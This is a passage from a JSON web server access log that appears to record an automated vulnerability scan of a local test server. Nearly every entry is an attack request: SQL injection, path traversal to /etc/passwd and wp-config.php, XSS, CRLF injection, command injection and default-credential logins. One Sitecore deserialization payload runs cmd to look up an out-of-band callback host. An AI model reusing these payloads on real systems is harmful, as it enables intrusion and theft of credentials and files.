/wp-admin/admin.php?page=zm_gallery&orderby=(SELECT%20(CASE%20WHEN%20(7422=7422)%20THEN%200x6e616d65%20ELSE%20(SELECT%203211%20UNION%20SELECT%208682)%20END))&order=desc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sql.7z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webadmin/start/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"http://127.0.0.1/webadmin/admin/systemstatus_inc_data.php", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-app.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..;/manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /DesktopModules/Admin/RadEditorProvider/DialogHandler.aspx?dp=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /systemController/showOrDownByurl.do?down=&dbPath=../Windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?rest_route=/whm/v3/themesettings HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/MBeanServerId HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /development.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cloudexp/application/configs/application.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.idea/workspace.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /LetsEncrypt/Index?fileName=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /views/ajax/autocomplete/user/a HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=zm_gallery&orderby=(SELECT%20(CASE%20WHEN%20(7422=7421)%20THEN%200x6e616d65%20ELSE%20(SELECT%203211%20UNION%20SELECT%208682)%20END))&order=desc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jmx-console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"echo\x0D\x0Aecho\x0D\x0Acat /etc/passwd 2>&1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sql.bz2 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=cf7skins&tab=%27%3E%3Cimg+src+onerror%3Dalert%28document.domain%29%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webadmin/tools/systemstatus_remote.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1/webadmin/admin/systemstatus_inc_data.php", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..;/host-manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /images/favicon.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%0ASet-Cookie:crlfinjection=crlfinjection HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /DesktopModule/UIQuestionControls/UIAskQuestion/Telerik.Web.UI.DialogHandler.aspx?dp=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /create_user/?username=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationName HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=duplicator_download&file=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config/authentication_page.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /system/console?.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cms/application/configs/application.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"----------------------------835846770881083140190633\x0D\x0AContent-Disposition: form-data; name=\x22editormd-image-file\x22; filename=\x22test.<>php\x22\x0D\x0AContent-Type: text/plain\x0D\x0A\x0D\x0A\x0D\x0A----------------------------835846770881083140190633--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php?s=/home/page/uploadImg HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.044","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?q=admin/views/ajax/autocomplete/user/a HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /env.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"\x0D\x0A\x0D\x0A \x0D\x0A foo\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A 2\x0D\x0A \x0D\x0A <_comparison z:Id=\x224\x22 z:FactoryType=\x22a:DelegateSerializationHolder\x22 z:Type=\x22System.DelegateSerializationHolder\x22 z:Assembly=\x220\x22\x0D\x0A xmlns=\x22http://schemas.datacontract.org/2004/07/System.Collections.Generic\x22\x0D\x0A xmlns:a=\x22http://schemas.datacontract.org/2004/07/System\x22>\x0D\x0A \x0D\x0A mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A Compare\x0D\x0A \x0D\x0A \x0D\x0A System.String\x0D\x0A System.Comparison`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]\x0D\x0A \x0D\x0A Start\x0D\x0A \x0D\x0A System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\x0D\x0A System.Diagnostics.Process\x0D\x0A System.Func`3[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A System.Diagnostics.Process Start(System.String, System.String)\x0D\x0A System.Diagnostics.Process Start(System.String, System.String)\x0D\x0A 8\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A Int32 Compare(System.String, System.String)\x0D\x0A System.Int32 Compare(System.String, System.String)\x0D\x0A 8\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A 2\x0D\x0A \x0D\x0A /c nslookup c9v8gc8smpv8b0ng0t001p76s3otj51um.oast.online\x0D\x0A cmd\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /sitecore/shell/ClientBin/Reporting/Report.ashx HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /node_modules/mqtt/test/helpers/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_profiler/empty/search/results?limit=10 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"[{\x22query\x22:\x22query {\x5Cn __typename \x5Cn }\x22}, {\x22query\x22:\x22mutation { \x5Cn __typename \x5Cn }\x22}]","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sql.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"{\x22user\x22:\x22access-admin\x22,\x22password\x22:\x22password\x22,\x22type\x22:\x22login\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /artifactory/ui/auth/login?_spring_security_remember_me=false HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"http://127.0.0.1/artifactory/webapp/", "request_method":"POST", "http_x_forwarded_for":"127.0.0.1"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/securimage-wp/siwp_test.php/%22/%3E%3Cscript%3Ealert(1);%3C/script%3E?tested=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /newVersion?callback=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?redirect=/\x5C/evil.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Modules/CMS/Telerik.Web.UI.DialogHandler.aspx?dp=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVendor HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=duplicator_download&file=%2F..%2Fwp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /en-US/splunkd/__raw/services/server/info/server-info?output_mode=json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wp-custom-pages/wp-download.php?url=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /moto/application/configs/application.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?q=views/ajax/autocomplete/user/a HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/projects HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /env.development.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": 